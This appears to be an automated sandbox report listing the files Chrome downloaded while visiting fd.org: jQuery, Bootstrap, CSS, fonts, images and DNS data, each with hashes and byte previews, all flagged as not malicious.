                                          Preview:L..................F.@.. ...$+.,......Y..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):6745
                                          Entropy (8bit):4.964719925840938
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5FDAF830FB30FD7DBAE3F5F2F17F8D88
                                          SHA1:C64BE8955C8D1CB1393095D24B68C83000A6B6A9
                                          SHA-256:BA217BE6D52D5AC6483EE7780CC93B16FCCAAFFCC0F28A9DB66DE5F929D0289D
                                          SHA-512:57C89CC8F8AEB4D981974ADE77CF93E0724350DB6C14D190165E8F82C1B648175DB33CEFF1C437F3B2B961A60ABB15C23E4F0EDC6A1173E793D4944490C88201
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/js/js_uiF75tUtWsZIPud4DMk7FvzKr_zA8oqdtm3l-SnQKJ0.js
                                          Preview:(function($) {../**. * jQuery debugging helper.. *. * Invented for Dreditor.. *. * @usage. * $.debug(var [, name]);. * $variable.debug( [name] );. */.jQuery.extend({. debug: function () {. // Setup debug storage in global window. We want to look into it.. window.debug = window.debug || [];.. args = jQuery.makeArray(arguments);. // Determine data source; this is an object for $variable.debug().. // Also determine the identifier to store data with.. if (typeof this == 'object') {. var name = (args.length ? args[0] : window.debug.length);. var data = this;. }. else {. var name = (args.length > 1 ? args.pop() : window.debug.length);. var data = args[0];. }. // Store data.. window.debug[name] = data;. // Dump data into Firebug console.. if (typeof console != 'undefined') {. console.log(name, data);. }. return this;. }.});.// @todo Is this the right way?.jQuery.fn.debug = jQuery.debug;..})(jQuery);.;.(function ($) {.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, baseline, precision 8, 300x130, components 3
                                          Category:dropped
                                          Size (bytes):19040
                                          Entropy (8bit):7.968524172314169
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BA59A1056D6A61E5429DFDEB88F29B93
                                          SHA1:2CB03E49F9183A96DBA3F8E354645B3C8E503AF4
                                          SHA-256:A101CA446E78F5133982209DE581218E88190B918BBD6926A0F1F67303BFA9EC
                                          SHA-512:1C0EE5309916E12494D29A8EED557AF56CFF5D1839273F90C8610844F4EAA6C6683E8122139A199645468A277BD67D9CF074705D3ADD78E03B149C51A8DC7061
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.............................................................................................................................................&....Adobe.d.............,........................................................................................!."1A.2Qa.#Bq..3$CRb....4r...%&Ts........................!1.qAQa."..............?..3M.`.`..H. X.U.}.N.t..........%..4.2>o..i..zWg./.]5......m$a!...g...'zy....R.......#.%.*.. ..V....^..^.4.b......H.P.....2...=...?.1g.)'h:q)..vp~....h.e......J{...>..'.E..v^.]...Ir...Id/U{..v?.."W..A.T...?0.(&..:*R.X.......7x.d%.2.w-....<...l..3..O.$}.}..rU..}yZ.:yS....#.$oUe.^.m.........f.P.Y.3..$...8..#z.xe..H...w..&.<.u2X..co..x..W.,s.t.8.f....kPj.@.m>...Q.q....]d?3.Rx. ...$....E.N...$3...\.:jv..F.......;vZ....i.o.-.N....^.`.n.H.._r../e-..$.......X...5...H.....J..i....;.[......X..._...q%y..+.#v(;.'.._.Ki..x._E...Y-:...4..Z.A.N....+H".....A...|.C$..u........h.lL.J.Gh...}...i....@..g.....^...=.."|...?..*I!.R.%6k;...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32012)
                                          Category:downloaded
                                          Size (bytes):69597
                                          Entropy (8bit):5.369216080582935
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 78168, version 331.-31196
                                          Category:downloaded
                                          Size (bytes):78168
                                          Entropy (8bit):7.996980715595138
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:A9FD1225FB2CD32320E2B931DCA01089
                                          SHA1:44EC5C6A868B4CE62350D9F040ED8E18F7A1D128
                                          SHA-256:C5DD43F53F3AF822CBF17B1FB75F46192CDBD51724F277ACF6CF0DACB3FD57E7
                                          SHA-512:58F45066D5738B1EF1F431EB9FC911FC9E6F61F60538F1577CD2EBE651BD8E7B87124DAE36C4E66FB303FD249EBA333BF41D316774201948CAD056BB0E4B4F2E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.woff2
                                          Preview:wOF2......1X..........0..K.$....................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u...m......6.........f%...N\!7.....w!......K..~.....DP)..V.u].5a..dQT1..#.bIIL&L=.....z....}4E.8..`..-..8..?....Xk.C..mV..`&...D."...V.c'.)......"/ .AD.4...i..S)e.72..@D "....~.Jj...~...so7r.....TK...P6..m5.>....1...=x...~.....mD...&.....4/.#[...v.U.,.3.O[aoy......f|.gKL..d.....e...P......c.j........H..../+d..Z....@.._....8.yk.0p.._~..g.C.:{..u.......h..n...I..%..#aD..$@....... ......'..G.89.*n...*._q.~....+]..uvX.r..!~n...7r.7*.9..6..7...`....=..j..~.:.......y..P.[.Q.7.../....J..j..B[`KliY.-m,.i..6.eW..^u]W7..qu.r..K.N..O..i9`H..0.!0.6............d..f......e.!,..oK....N:..-..X}..."....]..........j2....8.f5/b..n5..V.......d.C.....a.d!..,.../00).{y9V.W!..o.S.<..B>...mhH..%...X.....m~&....&.i.)`rS...."l..d......I.....B....;2Cb.SD........F..s.Z.S.Acb-.C.@..vj....=..Si...... .........i}._m..v.L..x..K.j_.v........]y...WV.B-{}1..E.9.{...9\.. .H..:svr..E_..q....._w...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):40085
                                          Entropy (8bit):4.901255986687235
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:546598741763FE575C589752EE8CEFA8
                                          SHA1:9491A80BDD03710A9CCDA320332F0B2B07C33D11
                                          SHA-256:F6C1933C119C3866632E248B1AB6049EE51FF1576F2E62FF0C464D34D6E71D79
                                          SHA-512:8B3905EA5E93118A036C0EB2359114804622BEC10D29DF25BFB75523DC6169341C95F8CB76A8B6F901B696DB196C2438DFD17589BD9D9835238F8337BFD3EF02
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/js/js_9sGTPBGcOGZjLiSLGrYEnuUf8VdvLmL_DEZNNNbnHXk.js
                                          Preview:/**. * For jQuery versions less than 3.4.0, this replaces the jQuery.extend. * function with the one from jQuery 3.4.0, slightly modified (documented. * below) to be compatible with older jQuery versions and browsers.. *. * This provides the Object.prototype pollution vulnerability fix to Drupal. * installations running older jQuery versions, including the versions shipped. * with Drupal core and https://www.drupal.org/project/jquery_update.. *. * @see https://github.com/jquery/jquery/pull/4333. */..(function (jQuery) {..// Do not override jQuery.extend() if the jQuery version is already >=3.4.0..var versionParts = jQuery.fn.jquery.split('.');.var majorVersion = parseInt(versionParts[0]);.var minorVersion = parseInt(versionParts[1]);.var patchVersion = parseInt(versionParts[2]);.var isPreReleaseVersion = (patchVersion.toString() !== versionParts[2]);.if (. (majorVersion > 3) ||. (majorVersion === 3 && minorVersion > 4) ||. (majorVersion === 3 && minorVersion === 4 && patchVersion >
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:downloaded
                                          Size (bytes):246
                                          Entropy (8bit):4.702497430787576
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8E30BE0F41A5DA64DA2962450B924902
                                          SHA1:F016F845983BD0A1DC62F760ACBBC6047654CFFB
                                          SHA-256:294A3A242391212B670150E312E35F7F4EF80C871A1294D70B638DB010A21D9E
                                          SHA-512:5C4ABDD1291DCF0C01C907686922D2EB2D379A7F4285B5550A3FE25CD47E4740F16B71ACF5B07F3F7A8C0E3A9DED5A2514812478FD7ED12091376C92987E732A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://dns.google/resolve?name=fd.org&type=MX
                                          Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"fd.org.","type":15}],"Answer":[{"name":"fd.org.","type":15,"TTL":192,"data":"10 mx04.fd.org."},{"name":"fd.org.","type":15,"TTL":192,"data":"10 mx03.fd.org."}]}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):244
                                          Entropy (8bit):4.661068944768326
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E39F32B54EE3ECC5849AD7DE642FE6A8
                                          SHA1:2F87274AB5B7B06F33E74DEC601BA8C7889C3815
                                          SHA-256:1C95F37A2EEF59519C20D6ED61FF52DEC8A636BFFB782B553987AFB66C15078C
                                          SHA-512:48AC03CB7BE2809CB887FD5F44F9F28939402AD205DFBCD68C17AB13115099B3E1CE6379C835503B0347CE77B11853380048E47A71CB2D3818114BBE0EA6EEEC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"fd.org.","type":15}],"Answer":[{"name":"fd.org.","type":15,"TTL":13,"data":"10 mx04.fd.org."},{"name":"fd.org.","type":15,"TTL":13,"data":"10 mx03.fd.org."}]}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):16
                                          Entropy (8bit):3.75
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:526AEAAC6585D1A93C2270A0DAC4C44A
                                          SHA1:1325D4CF2C798C791DFB54C388494082E29997E1
                                          SHA-256:EB42ACA8B28A1BE2B2449230C9DDEFB50D17ECF1D4E15E6DF9786A70296755C9
                                          SHA-512:A791A080D0CE86132D4C6B5A49B085A53ADDF519F2DE1A6DA57BA30C0CCA0D9377B68F6C636751DDD0B6FCF4BF5E61BD30592CD61D8E3E97B1DE89265E537AA7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAk-fTSP0o_IfRIFDatHjDs=?alt=proto
                                          Preview:CgkKBw2rR4w7GgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 32 x 10, 8-bit gray+alpha, non-interlaced
                                          Category:downloaded
                                          Size (bytes):153
                                          Entropy (8bit):6.088316886081891
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A49DBD134C3B5400D64DB81A7F63A54E
                                          SHA1:64CD04C7F8A06A2468D7B5504679991398D9768C
                                          SHA-256:36E06ADF8AE9795E359EEE78D24E09452454D9B960B88E40A0695B0181270247
                                          SHA-512:B98889CD97C7EED4EE2AE5130E4D5C8080D9944EABDBA40128279FC053E74799C01E488F567DF5A911C5790E79550C0990532FB5AEB349A0C5EDA27B358BBAA7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/all/modules/extlink/extlink_s.png
                                          Preview:.PNG........IHDR... ..........D./...`IDAT(..... .C...vb'<T>..*^./.H4.5...$....t.<.O..\..;. ....Z......5.f.DAC_.d..a....J..w.l.....K....2.E....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 260x130, components 3
                                          Category:downloaded
                                          Size (bytes):7069
                                          Entropy (8bit):7.8751135476897804
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3FCDDA219A05CE09810D8E7C205F8193
                                          SHA1:BD91D6FE1291B4F6C7FE261187E36E9CEA2EDBAC
                                          SHA-256:73A5AFE0870AFE25C696CB909BE55F748B2C3BE985E49A511F4A471CA1ABB0B5
                                          SHA-512:2B60A1515F3643B3292963C6EE01C5CBB85BB84FDAF3F5136DE271944E91BC2F5F24E741A21410811E9DBA2B1BB585007669D84159F870FD4D84AD6454B5A6A5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/featured_topics_images/ft_sentencing-resources.jpg
                                          Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:d472ba89-a3f2-bd4b-8bc3-bead61d277a0" xmpMM:DocumentID="xmp.did:9C362D3085BD11E69DD488A07BAA61C2" xmpMM:InstanceID="xmp.iid:9C362D2F85BD11E69DD488A07BAA61C2" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48456929-4780-4048-8112-9baedf073d53" stRef:documentID="xmp.did:d472ba89-a3f2-bd4b-8bc3-bead61d277a0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (48664)
                                          Category:downloaded
                                          Size (bytes):48944
                                          Entropy (8bit):5.272507874206726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 381x193, components 3
                                          Category:dropped
                                          Size (bytes):29064
                                          Entropy (8bit):7.958374718096985
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EBCDC7AF391FDE448BE3DA58EAB3BDFA
                                          SHA1:C4495BF2662FAB2D99F6328BBE7B6D6D8DD0A831
                                          SHA-256:1B5B149AD5B41DE74A0501E50671E307D5E90ED3754E112E3D194C39E8F9DBCB
                                          SHA-512:D5952798E67D04DF364B8067F0CB48A9A1637EA039077CDA2F8F899CADE237C4DF08DE0EC4F8E1F84F4C48155C5F6810392DF38FC5B9FF8B942C0BBB721A90E7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:3af7306f-ff35-e948-b1a1-58df114de83b" xmpMM:DocumentID="xmp.did:D291DC8C8FAD11EEA0FFAE63A0EABB15" xmpMM:InstanceID="xmp.iid:D291DC8B8FAD11EEA0FFAE63A0EABB15" xmp:CreatorTool="Adobe Photoshop 25.2 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3af7306f-ff35-e948-b1a1-58df114de83b" stRef:documentID="xmp.did:3af7306f-ff35-e948-b1a1-58df114de83b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32065)
                                          Category:dropped
                                          Size (bytes):85578
                                          Entropy (8bit):5.366055229017455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 260 x 130, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):24102
                                          Entropy (8bit):7.913851452542093
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C13147848399B823C81B8D67FE159F14
                                          SHA1:AF3396C6AD873CF634C00DEC2884FCD02D2BF093
                                          SHA-256:D9BC97DB2D94643F9B683801C88DD2F4C4608AEA2429120DF0B82A0B450129F8
                                          SHA-512:7530F3E2DD479B75CB0CC81402CEED0DD59403A81145CB15D2D573504099E2091171D1733902EDBD7A3351CAC175D3ACDCEE39F64E344CCEC1C7441E8845C23E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/featured_topics_images/fd-td-race.png
                                          Preview:.PNG........IHDR............./.!,....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CS4 Windows" xmp:CreateDate="2016-09-27T09:08:07-05:00" xmp:ModifyDate="2020-07-16T16:45:08-04:00" xmp:MetadataDate="2020-07-16T16:45:08-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (8321)
                                          Category:downloaded
                                          Size (bytes):8322
                                          Entropy (8bit):4.823972130259148
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5DFE2595B519C9E1C6108B1B0CC82EE5
                                          SHA1:6A8656A1FDD76C46892D7FBCD5EDC88BA1E2CD3A
                                          SHA-256:7CC12ED5CAA340BC00480A8485E6E916AA3FD894056E0E017224C4D5FF3F0DE8
                                          SHA-512:E2628CDD64F0A90375479C4A3376F67C1E60816E2BA11A56ECD45994BE11258F9FB75CCF2F7A6B8336B3A9A2A9277B1A738D3C490B5E14FBB0978C1C29E46197
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/css/css_fMEu1cqjQLwASAqEhebpFqo_2JQFbg4BciTE1f8_Deg.css
                                          Preview:img{width:100%;}.l-branding .site-logo img{width:90%}.l-page{max-width:1250px;margin:0 auto;}.l-header,.l-main,.l-footer{max-width:1200px;margin-left:auto;margin-right:auto;padding-bottom:20px;}.l-header:after,.l-main:after,.l-footer:after{content:" ";display:block;clear:both;}.block--superfish-1{padding:.75em .5em;}.l-region--navigation select#superfish-1-select{width:100%;}.l-content{padding:0 0.5em;}.l-region--header{margin-bottom:.5em;padding:0 1em;}.l-region--header .fd-login-button{}.l-region--header .block--search{float:none;margin-top:.5em;}.l-region--header .block--search .form-text{width:70%;}.l-region--header .block--search .form-submit{width:65px;}.l-region--header .block--system-user-menu ul.menu{width:100%;text-align:center;}.l-region--header .block--system-user-menu ul.menu .leaf{width:33%;}.l-region--highlighted,.l-region--help,.l-region--sidebar-first,.l-region--sidebar-second{margin-bottom:20px;}#custom-front .front-row-top .front-row-top-region-1,#custom-front .front
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (24796)
                                          Category:downloaded
                                          Size (bytes):25786
                                          Entropy (8bit):4.951291482752786
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A78BC09453594966779D8BD2C985CD77
                                          SHA1:EC47C48585125B9B21404CE1ADBAE392532A74DB
                                          SHA-256:A6474B547087F170D9B564620CC5326C86A53AF62471DE8A72D4F07D627C0296
                                          SHA-512:923DAF70857EAD527D1CEDC8EBAE842038A1D60E28A89F3D360C9C4470F077234579ABD6F391BC09DE32D6DA780C4C94925D03BB73CAF976AFFD50F23AC4A65B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/css/css_pkdLVHCH8XDZtWRiDMUybIalOvYkcd6KctTwfWJ8ApY.css
                                          Preview:// http://meyerweb.com/eric/tools/css/reset/.// v2.0 | 20110126.// License:none (public domain)@mixin meyer-reset{html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline;}// HTML5 display-role reset for older browsers. article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block;}body{line-height:1;}ol,ul{list-style:none;}blockquote,q{quotes:none;}blockquote{&:before,&:after{content:"";content:none;}}q{&:before,&:after{content:"";content:none;}}table{border-collapse:collapse;border-spacing:0;}}@include meyer-reset;.img,media{m
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (2343)
                                          Category:dropped
                                          Size (bytes):52916
                                          Entropy (8bit):5.51283890397623
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (22240)
                                          Category:downloaded
                                          Size (bytes):46775
                                          Entropy (8bit):5.183478112215167
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1DF950F5E00E66BB3574F6D4D003DA8B
